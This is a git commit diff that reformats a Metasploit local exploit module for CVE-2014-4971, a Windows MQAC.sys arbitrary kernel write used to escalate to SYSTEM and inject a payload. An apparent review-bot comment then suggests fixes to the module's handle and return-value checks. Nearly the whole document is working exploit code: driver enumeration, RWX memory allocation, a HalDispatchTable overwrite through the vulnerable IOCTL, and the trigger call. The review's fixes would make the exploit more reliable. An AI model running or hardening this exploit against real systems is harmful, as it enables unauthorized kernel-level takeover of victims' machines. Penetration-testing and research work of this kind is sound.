Merge rubocop changes from Kernelsmith
commit
f3e8c51573
|
@ -15,15 +15,15 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
INVALID_HANDLE_VALUE = 0xFFFFFFFF
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info, {
|
||||
super(update_info(info,
|
||||
'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
|
||||
'Description' => %q{
|
||||
'Description' => %q(
|
||||
A vulnerability within the MQAC.sys module allows an attacker to
|
||||
overwrite an arbitrary location in kernel memory.
|
||||
|
||||
This module will elevate itself to SYSTEM, then inject the payload
|
||||
into another SYSTEM process.
|
||||
},
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'SessionTypes' => ['meterpreter'],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -46,30 +46,38 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'_UPID' => "\x84",
|
||||
'_APLINKS' => "\x88"
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-4971' ],
|
||||
[ 'EDB', '34112' ],
|
||||
%w(CVE 2014-4971),
|
||||
%w(EDB 34112),
|
||||
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jul 22 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
))
|
||||
end
|
||||
|
||||
def find_sys_base(drvname)
|
||||
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
|
||||
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
|
||||
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
|
||||
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
|
||||
lp_image_base = %w(PBLOB lpImageBase out)
|
||||
cb = %w(DWORD cb in)
|
||||
lpcb_needed = %w(PDWORD lpcbNeeded out)
|
||||
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
|
||||
[lp_image_base, cb, lpcb_needed])
|
||||
image_base = %w(LPVOID ImageBase in)
|
||||
lp_base_name = %w(PBLOB lpBaseName out)
|
||||
n_size = %w(DWORD nSize in)
|
||||
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
|
||||
[image_base, lp_base_name, n_size])
|
||||
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
|
||||
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
|
||||
|
||||
addresses.each do |address|
|
||||
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
|
||||
current_drvname = results['lpBaseName'][0..results['return'] - 1]
|
||||
if drvname == nil
|
||||
if drvname.nil?
|
||||
if current_drvname.downcase.include?('krnl')
|
||||
return [address, current_drvname]
|
||||
end
|
||||
|
@ -99,12 +107,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def open_device
|
||||
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
|
||||
if handle['return'] == 0
|
||||
handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
|
||||
'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
|
||||
handle = handle['return']
|
||||
if handle == 0
|
||||
print_error('Failed to open the \\\\.\\MQAC device')
|
||||
return nil
|
||||
end
|
||||
handle = handle['return']
|
||||
handle
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -141,8 +151,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return
|
||||
end
|
||||
|
||||
# Running on Windows XP versions that aren't listed in the supported list results
|
||||
# in a BSOD and so we should not let that happen.
|
||||
# Running on Windows XP versions that aren't listed in the supported list
|
||||
# results in a BSOD and so we should not let that happen.
|
||||
return unless check == Exploit::CheckCode::Appears
|
||||
|
||||
kernel_info = find_sys_base(nil)
|
||||
|
@ -154,7 +164,10 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
this_proc = session.sys.process.open
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
|
||||
[0xffff].pack('L'),
|
||||
'MEM_COMMIT|MEM_RESERVE',
|
||||
'PAGE_EXECUTE_READWRITE')
|
||||
end
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
print_error('Failed to properly allocate memory')
|
||||
|
@ -164,7 +177,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
|
||||
hKernel = hKernel['return']
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
|
||||
'HalDispatchTable')
|
||||
halDispatchTable = halDispatchTable['return']
|
||||
halDispatchTable -= hKernel
|
||||
halDispatchTable += kernel_info[0]
|
||||
|
@ -193,8 +207,10 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
this_proc.close
|
||||
|
||||
print_status('Triggering vulnerable IOCTL')
|
||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
||||
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
|
||||
1, 0x258,
|
||||
halDispatchTable + 0x4, 0)
|
||||
session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||
|
||||
unless is_system?
|
||||
print_error('Exploit failed')
|
||||
|
@ -207,5 +223,4 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Failure::Unknown, 'Error while executing the payload')
|
||||
end
|
||||
end
|
||||
|
||||
end
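Review bot: The failure check on the new `if handle == 0` line in `open_device` (hunk `@ -99,12 +107,14 @@`) tests the wrong sentinel: CreateFileA signals failure with INVALID_HANDLE_VALUE, and the class already defines `INVALID_HANDLE_VALUE = 0xFFFFFFFF` in the context of the first hunk, so a failed open slips past this guard and the 0xFFFFFFFF value is presumably what later reaches the NtDeviceIoControlFile call in the `@ -193,8 +207,10 @@` hunk. Change the guard to `if handle == INVALID_HANDLE_VALUE` (or `if handle == INVALID_HANDLE_VALUE || handle == 0` if a zero return is also observed through railgun, which the hunk does not show), keeping the print_error / `return nil` branch as it is. The same unchecked-return pattern appears in the `@ -164,7 +177,8 @@` hunk, where `hKernel` from LoadLibraryExA and `halDispatchTable` from GetProcAddress are used in arithmetic without testing for 0, and in the `find_sys_base` hunk, where `results['return']` from EnumDeviceDrivers is never consulted before slicing `lpImageBase` by `lpcbNeeded`.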
|
||||
|
|